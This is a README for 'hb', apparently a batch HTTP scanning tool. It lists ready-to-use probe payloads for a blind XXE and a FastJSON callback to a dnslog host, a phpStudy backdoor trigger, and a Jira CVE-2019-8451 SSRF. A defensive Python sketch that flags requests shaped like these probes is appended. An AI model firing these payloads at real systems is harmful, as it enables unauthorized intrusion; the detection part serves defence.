hb
Fast HTTP batch request tool
Installing
bash build.sh
Example
Load File Target
./hb -f ips.txt -p 80
Add HTTP Header
-H "Host: bypasscdn"
Show ProgressBar
-pg
Follow redirect (30x)
-redirect
Filter Response Body
-grep "admin"
Filter Response Header (X-Powered-By, Content-Type, Title)
-filter "nginx"
Filter Response Status Code
-code 2 # 2xx
Show Response Body
-response
Shuffle Request
-random
Send Post Request
-body "a=1&b=2&c=2"
# post body from file
-bodyfile ./exploit
Send PUT Request
-method PUT
Show Request Error
-debug
Elasticsearch
-p 9200 -path "/_cat" -grep "/_cat/allocation"
PHPINFO
-path /phpinfo.php -code 2 -grep 'PHP Version' -regexp 'PHP Version(.*?)<'
XXE Blind
-body '<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY remote SYSTEM "http://{{hostname}}.dnslog/">]><x>&remote;</x>' -replace
FastJSON Blind
-H "Content-Type: application/json" -body '{"@type": "java.net.InetAddress", "val":"{{hostname}}.dnslog"}' -replace -redirect
Weblogic fingerprint
-p 7001 -H "Authorization: Basic" -code 401
phpStudy Backdoor
-H "Accept-Charset: cGhwaW5mbygpOwo=" -H "Accept-Encoding: gzip,deflate" -grep 'PHP Version' -regexp '<tr><td class="e">disable_functions</td><td class="v">(.*?)</td>' -redirect
CVE-2019-8451 Jira SSRF
-path "/plugins/servlet/gadgets/makeRequest?url={{scheme}}://{{host}}@baidu.com/" -H "X-Atlassian-Token: no-check" -replace -grep "www.baidu.com" -regexp '<meta name="ajs-version-number" content="(.*?)">' -redirect
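For the receiving side, the sketch below labels captured requests that have the shape of the phpStudy, FastJSON, XXE and Jira makeRequest probes listed above. It is an added example, not part of hb; the function names, labels and sample hostnames are assumptions made for illustration.

```python
import base64, json, re
from urllib.parse import parse_qs, urlsplit

PHP_CALL = re.compile(r"[A-Za-z_]\w*\s*\(.*\)\s*;")
EXT_ENTITY = re.compile(r"<!ENTITY\s+\S+\s+SYSTEM\s+[\"']https?://", re.I)
JAVA_CLASS = re.compile(r"[a-z]\w*(\.[A-Za-z_$][\w$]*)+")

def has_java_type(node):
    """True if any JSON object names a dotted Java class in an "@type" key."""
    if isinstance(node, dict):
        value = node.get("@type")
        if isinstance(value, str) and JAVA_CLASS.fullmatch(value):
            return True
        return any(has_java_type(v) for v in node.values())
    return isinstance(node, list) and any(has_java_type(v) for v in node)

def classify(path, headers, body=""):
    """Label a captured request with the probe shapes from this README."""
    hdr = {k.lower(): v for k, v in headers.items()}
    hits = []
    try:  # Accept-Charset holding base64 that decodes to a PHP statement
        text = base64.b64decode(hdr.get("accept-charset", ""), validate=True).decode("ascii")
        if PHP_CALL.search(text):
            hits.append("phpstudy-accept-charset")
    except ValueError:  # not base64 / not ASCII: an ordinary charset list
        pass
    if EXT_ENTITY.search(body):  # DTD entity that fetches a remote URL
        hits.append("xxe-external-entity")
    if "json" in hdr.get("content-type", "").lower():
        try:  # fastjson-style "@type" class selector in a JSON body
            if has_java_type(json.loads(body)):
                hits.append("fastjson-type-key")
        except ValueError:
            pass
    parts = urlsplit(path)
    if parts.path.endswith("/gadgets/makeRequest"):  # url= with userinfo before "@"
        if any(urlsplit(u).username for u in parse_qs(parts.query).get("url", [])):
            hits.append("jira-makerequest-userinfo")
    return hits

# Constructed sample requests (hostnames are placeholders)
SAMPLES = [
    ("/", {"Accept-Charset": "cGhwaW5mbygpOwo=", "Accept-Encoding": "gzip,deflate"}, ""),
    ("/", {"Content-Type": "application/json"}, '{"@type": "java.net.InetAddress", "val": "h1.dnslog.example"}'),
    ("/plugins/servlet/gadgets/makeRequest?url=http://jira.example@baidu.com/", {}, ""),
    ("/", {"Accept-Charset": "utf-8, iso-8859-1;q=0.5"}, "<x>hello</x>"),
]
if __name__ == "__main__":
    print([classify(*s) for s in SAMPLES])
```

These are shape checks for triage: a hit means the request resembles one of the probes, not that the target is affected.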